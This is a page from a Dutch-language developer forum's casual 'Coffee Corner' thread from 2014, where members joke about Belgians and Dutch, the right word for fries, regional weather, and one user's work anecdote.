Hah, ik dacht op zich niet heel erg na wat de zin had moeten betekenen, maar in interpreteerde het als "de voorstelling houdt hier op en gaat ergens anders door". Dat je in een duivenhoek maar moeilijk een voorstelling kunt geven heb ik niet bij stilgestaan :+
12 Ik zou de stroomgenerator kunnen in gang zetten, maar die veroorzaakt een ondraaglijke stank in de hele straat.
Compleet over de woordvolgorde heengelezen 8)7
13 Mijn broertje was niet in het minst verlegen; aan elke politieagent vroeg hij of hij eens met zijn dienstwapen mocht schieten.
Die constructie vind ik niet raar klinken eerlijk gezegd.
16 We stonden naar de apen te kijken en merkten dat sommige een ongezonde seksuele appetijt vertoonden.
Idem. Maar misschien komt dat door mijn verengelsing.
17 Ze gaan nooit geloven dat je die stier hebt kunnen vangen en terugbrengen naar de weide.
Idem.

Maar op basis van deze zinnen zou mijn score eigenlijk 25% moeten zijn.

Tot slot:
"nog" na "de berg".

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

Met, op de normale plek. _O-
ElkeBxl schreef op dinsdag 04 november 2014 @ 15:23:
[...]

One of us! One of us! One of us!
NO }:|

[ Voor 40% gewijzigd door Firesphere op 04-11-2014 15:32 ]

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Geef me hier nog wat tijd en dat lukt ooit wel :)B }) :Y

Acties:
  • 0 Henk 'm!

• Alex)
Of andersom. Ontvoeren we Elke gewoon :+

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

NEVER!

Moeten jullie me eerst vinden :p

Acties:
  • 0 Henk 'm!

• Mercatres
Mwah, een vrouwelijke COBOL-programmeur in Brussel? Dat moet niet zo moeilijk zijn, gok ik zo.

Acties:
  • 0 Henk 'm!

• Alex)
We belegeren Brussel en eisen dat ze ons Elke geven. _O-

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Punt 1: alsof die fransozen hier een nl'er gaan verstaan.
Punt 2: alsof jullie genoeg frans kennen om mij hier te vinden.

I think I'm safe ;)

Acties:
  • 0 Henk 'm!

• Alex)
Nous demandons Elke!

:7

Acties:
  • 0 Henk 'm!

• DeluxZ
  • Registratie: Augustus 2003
  • Laatst online: 15-09 11:49

DeluxZ

Livin' the good life

Waar blijft de PHP discussie? Genoeg over Belgen en Nederlanders :+

]|[ Apple Macbook Pro Retina 13" ]|[

Acties:
  • 0 Henk 'm!

• Mercatres
ElkeBxl schreef op dinsdag 04 november 2014 @ 15:44:
Punt 1: alsof die fransozen hier een nl'er gaan verstaan.
Punt 2: alsof jullie genoeg frans kennen om mij hier te vinden.

I think I'm safe ;)
Je kent duidelijk het zoekalgoritme van LinkedIn nog niet? :p

Acties:
  • 0 Henk 'm!

• Alex)
Het is friet.

:+

Acties:
  • 0 Henk 'm!

• Creepy
  • Registratie: Juni 2001
  • Laatst online: 21-09 21:47

Creepy

Tactical Espionage Splatterer

:D

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney

Acties:
  • 0 Henk 'm!

• _David_
  • Registratie: Februari 2011
  • Laatst online: 11:06

_David_

FP ProMod

llama llama duck

I thought fail2ban would keep the script kiddies out but somehow you still seem to be able to login.

Acties:
  • 0 Henk 'm!

• Alex)
Ach, boven de rivieren wil je toch niet zijn.

Acties:
  • 0 Henk 'm!

• Mercatres
Alex) schreef op dinsdag 04 november 2014 @ 15:48:
[...]

Nee, inderdaad. Vorige week dinsdag naar Amsterdam (m'n broers masterdiploma-uitreiking) geweest. Hele tijd mooi weer, net voorbij Utrecht opeens grijs. Maar echt grijs, niet een klein beetje sluierbewolking.

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

"Elk est disparue mais tu pourrais chercher dans les cafés. Malheureusement ils y ont si beaucoup que c'est mieux de retourner au pays des fromages" :+
Mercatres schreef op dinsdag 04 november 2014 @ 15:45:
[...]

Je kent duidelijk het zoekalgoritme van LinkedIn nog niet? :p
Nope, maar je mag altijd poging wagen om me eens daarop te vinden :) Geen idee hoe vindbaar ik daarop ben.
Frieten! :( Merde, nu heb ik zin in een pak frieten 8)7

Acties:
  • 0 Henk 'm!

• BikkelZ

BikkelZ

CMD+Z

Krijg ontzettende heimwee naar Swerts :(

iOS developer

Acties:
  • 0 Henk 'm!

• Vincentio
  • Registratie: Februari 2002
  • Niet online
Alex) schreef op dinsdag 04 november 2014 @ 15:48:
[...]

Mooi blijven jullie lekker eronder, wij blijven liever erboven, dus dat komt allemaal goed uit. :P

Acties:
  • 0 Henk 'm!

• Gleighton
  • Registratie: November 2008
  • Niet online
Maar ik wil jullie boven de rivieren er wel graag aan herinneren dat het onder de rivieren toch wel significant beter is :D

Acties:
  • 0 Henk 'm!

• EtHeO18
  • Registratie: Januari 2006
  • Laatst online: 16-09 09:48

Acties:
  • 0 Henk 'm!

• Alex)
Gleighton schreef op dinsdag 04 november 2014 @ 15:53:
Maar ik wil jullie boven de rivieren er wel graag aan herinneren dat het onder de rivieren toch wel significant beter is :D
Deze man weet.
Mercatres schreef op dinsdag 04 november 2014 @ 15:50:
[...]

Nee, inderdaad. Vorige week dinsdag naar Amsterdam (m'n broers masterdiploma-uitreiking) geweest. Hele tijd mooi weer, net voorbij Utrecht opeens grijs. Maar echt grijs, niet een klein beetje sluierbewolking.
Ik merk dat al als ik onderweg ben naar huis. Tussen Barendrecht en het Hollandsch Diep is het dan zwaarbewolkt en regenachtig, maar zodra mijn trein Brabant binnenrijdt schijnt de zon. O+

[ Voor 50% gewijzigd door Alex) op 04-11-2014 15:55 ]

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Toch niet als je over hoeveelheden spreekt? Kan zijn dat ik me vergis hoor, ik kan me wel redleijk goed verwoorden in het frans maar ga me zeker geen experte noemen :)

Acties:
  • 0 Henk 'm!

• EtHeO18
  • Registratie: Januari 2006
  • Laatst online: 16-09 09:48
ElkeBxl schreef op dinsdag 04 november 2014 @ 15:55:
[...]

Toch niet als je over hoeveelheden spreekt? Kan zijn dat ik me vergis hoor, ik kan me wel redleijk goed verwoorden in het frans maar ga me zeker geen experte noemen :)
Het is ook niet mijn moedertaal, maar deze heb ik er ooit eens in geslagen gekregen. Daarom viel ie me nu op, en wilde ik weten of ik het bij het rechte eind had :)

Acties:
  • 0 Henk 'm!

• Mercatres
Over die diploma-uitreiking nog een leuke anekdote. We zaten net in een opleveringsperiode, en we waren aan het wachten op approval van de klant. Ik had dus net die dag vrij voor de diploma-uitreiking, maar had wel voor de zekerheid mijn laptop mee. Kreeg ik dus onderweg een telefoontje van m'n baas: of ik niet z.s.m. kon releasen?
Zodoende zat ik dus in het Joods cultureel centrum met m'n laptop en een tablet voor tethering te publishen. Terwijl er overal om me heen allemaal mensen in pak aan het rondlopen waren. Moet nogal een gezicht zijn geweest dus (vooral omdat de security iets zwaarder is dan in een gemiddeld cultureel centrum: toegangssluis enz.

Acties:
  • 0 Henk 'm!

• alienfruit
  • Registratie: Maart 2003
  • Laatst online: 13:37

alienfruit

the alien you never expected

Een Duitstalige belg dan hebben we pas echt wat om over te praten ;)

Acties:
  • 0 Henk 'm!

• Mercatres
alienfruit schreef op dinsdag 04 november 2014 @ 16:05:
Een Duitstalige belg dan hebben we pas echt wat om over te praten ;)
* Mercatres zwaait
Ik heb een tijdje in Duitsland gewoond, maar woon dus nu al ruim 16 jaar in België. Wel geboren in Nederland. Dat levert ook altijd leuk gespreksvoer op.

Acties:
  • 0 Henk 'm!

• Erwin537
  • Registratie: December 2008
  • Laatst online: 17:27
Over de juiste benaming van patat: 'friet' is echt fout.. het is 'frites'

Acties:
  • 0 Henk 'm!

• incaz
Alex) schreef op dinsdag 04 november 2014 @ 15:55:
Ik merk dat al als ik onderweg ben naar huis. Tussen Barendrecht en het Hollandsch Diep is het dan zwaarbewolkt en regenachtig, maar zodra mijn trein Brabant binnenrijdt schijnt de zon. O+
Alex) is gewoon een schuilnaam van Guus Meeuwis!!! Betrapt!!

Acties:
  • 0 Henk 'm!

• Geerrrt
  • Registratie: Juli 2008
  • Laatst online: 15:49
ElkeBxl schreef op dinsdag 04 november 2014 @ 15:51:
[...]

Nope, maar je mag altijd poging wagen om me eens daarop te vinden :) Geen idee hoe vindbaar ik daarop ben.
Vrijwilligerswerk bij Basta Brussel gedaan?

Eury#2434

Acties:
  • 0 Henk 'm!

• Alex)
incaz schreef op dinsdag 04 november 2014 @ 16:16:
[...]

Alex) is gewoon een schuilnaam van Guus Meeuwis!!! Betrapt!!
Da's een Tilburger Afbeeldingslocatie: http://i.imgur.com/IqKzErx.gif

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

ElkeBxl schreef op dinsdag 04 november 2014 @ 15:35:
[...]

Geef me hier nog wat tijd en dat lukt ooit wel :)B }) :Y
Ten eerste ben en blijf ik man, dat ga ik echt niet (laten) veranderen (Rubinski schijnt daar nog wat overwegingen over te hebben, maargoed, da's dan ook een Belg)

Daarnaast ben ik ook geenszins van plan in zo'n achtergesteld gebied als Vlamie te gaan wonen.

Acties:
  • 0 Henk 'm!

• roeleboel
  • Registratie: Maart 2006
  • Niet online

roeleboel

en zijn beestenboel

Erwin537 schreef op dinsdag 04 november 2014 @ 16:10:
Over de juiste benaming van patat: 'friet' is echt fout.. het is 'frites'
Nope: fritten!
Pagina: 1 ... 90 ... 101 Laatste

Dit topic is gesloten.

Let op:
Dit topic is niet de plaats om te lopen helpdesken. De Coffee Corner is primair bedoeld als uitlaatklep voor iedereen in de Devschuur® en niet als vraagbaak.